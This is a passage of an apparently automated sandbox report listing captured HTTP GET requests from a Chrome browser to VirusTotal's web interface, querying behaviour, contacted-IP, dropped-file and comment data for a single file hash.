          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mitre_trees HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTE0MDUzMTcyMjktWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjUwMQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mbc_trees HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTQxMTAyMDY0NzUtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjUwMg==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_parents HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/mitre_format?link=true HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTE5NzI4NzI1NzktWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjUwMg==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/pe_resource_children HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTY2NzkxNzI0NDctWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI4LjUwMw==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_domains HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/votes?relationships=item%2Cvoter HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTM1MzgwNzkyMTItWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI5LjM5OQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/dropped_files HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/comments?relationships=item%2Cauthor HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTE2OTE2MTYxMjQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI5LjM5OQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/graphs?relationships=owner%2Cviewers%2Ceditors HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTIzNzkxMTQ5ODctWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI5LjQ=sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/bundled_files HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_ips?limit=10&cursor=eyJsaW1pdCI6IDEwLCAib2Zmc2V0IjogMTB9 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTc3NzU3NjMwNTMtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTI5LjcwNQ==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mitre_trees HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/dropped_files?limit=10&cursor=eyJsaW1pdCI6IDEwLCAib2Zmc2V0IjogMTB9 HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTIwMjIzNTU1MzUtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTMwLjU1Nw==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/bundled_files?limit=10&cursor=MTB8fHYzfHwxNzE0MDc0OTMxfHwyNWE1MmNhNDQ4NzE5OWMzYjUwMmU2ZjcwODI4MTNjMTVmMmY0ZmEwYjEyYmE2NDQ4M2Y4MWIyYmIzODFjOGEw HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTEzMjY3NTAzMTgtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTMxLjA4Nw==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/comments?relationships=item%2Cauthor HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviours?limit=40 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mbc_trees HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mitre_trees HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTQyMzg4NDA5MzItWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTMxLjU5Nw==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/graphs?relationships=owner%2Cviewers%2Ceditors HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/votes?relationships=item%2Cvoter HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/icon.types-zip.5dbd88de5aaca441ade4.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/contacted_ips?limit=10&cursor=eyJsaW1pdCI6IDEwLCAib2Zmc2V0IjogMTB9 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/bundled_files?limit=10&cursor=MTB8fHYzfHwxNzE0MDc0OTMxfHwyNWE1MmNhNDQ4NzE5OWMzYjUwMmU2ZjcwODI4MTNjMTVmMmY0ZmEwYjEyYmE2NDQ4M2Y4MWIyYmIzODFjOGEw HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/dropped_files?limit=10&cursor=eyJsaW1pdCI6IDEwLCAib2Zmc2V0IjogMTB9 HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/behaviour_mitre_trees HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /gui/65941.e44934c037380e9ec129.js HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/files/76f98321f50595725f64f058d8f33103d518c5d77680fd7d5521c41786299358/analyse HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTM3NTE0NDgyMDQtWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTM2LjAzNg==sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1Host: www.virustotal.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
          Source: global trafficHTTP traffic detected: GET /ui/analyses/MjgyZGEwMjA3OThhZmJkN2VmZjQwY2U4NTRlOGQwMWY6MTcxNDA3NDkzNg== HTTP/1.1Host: www.virustotal.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"x-app-version: v1x259x2X-Tool: vt-ui-mainsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36content-type: application/jsonaccept: application/jsonAccept-Ianguage: en-US,en;q=0.9,es;q=0.8X-VT-Anti-Abuse-Header: MTkyMTA1NDE2MjItWkc5dWRDQmlaU0JsZG1scy0xNzE0MDc0OTM4LjYysec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.virustotal.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; 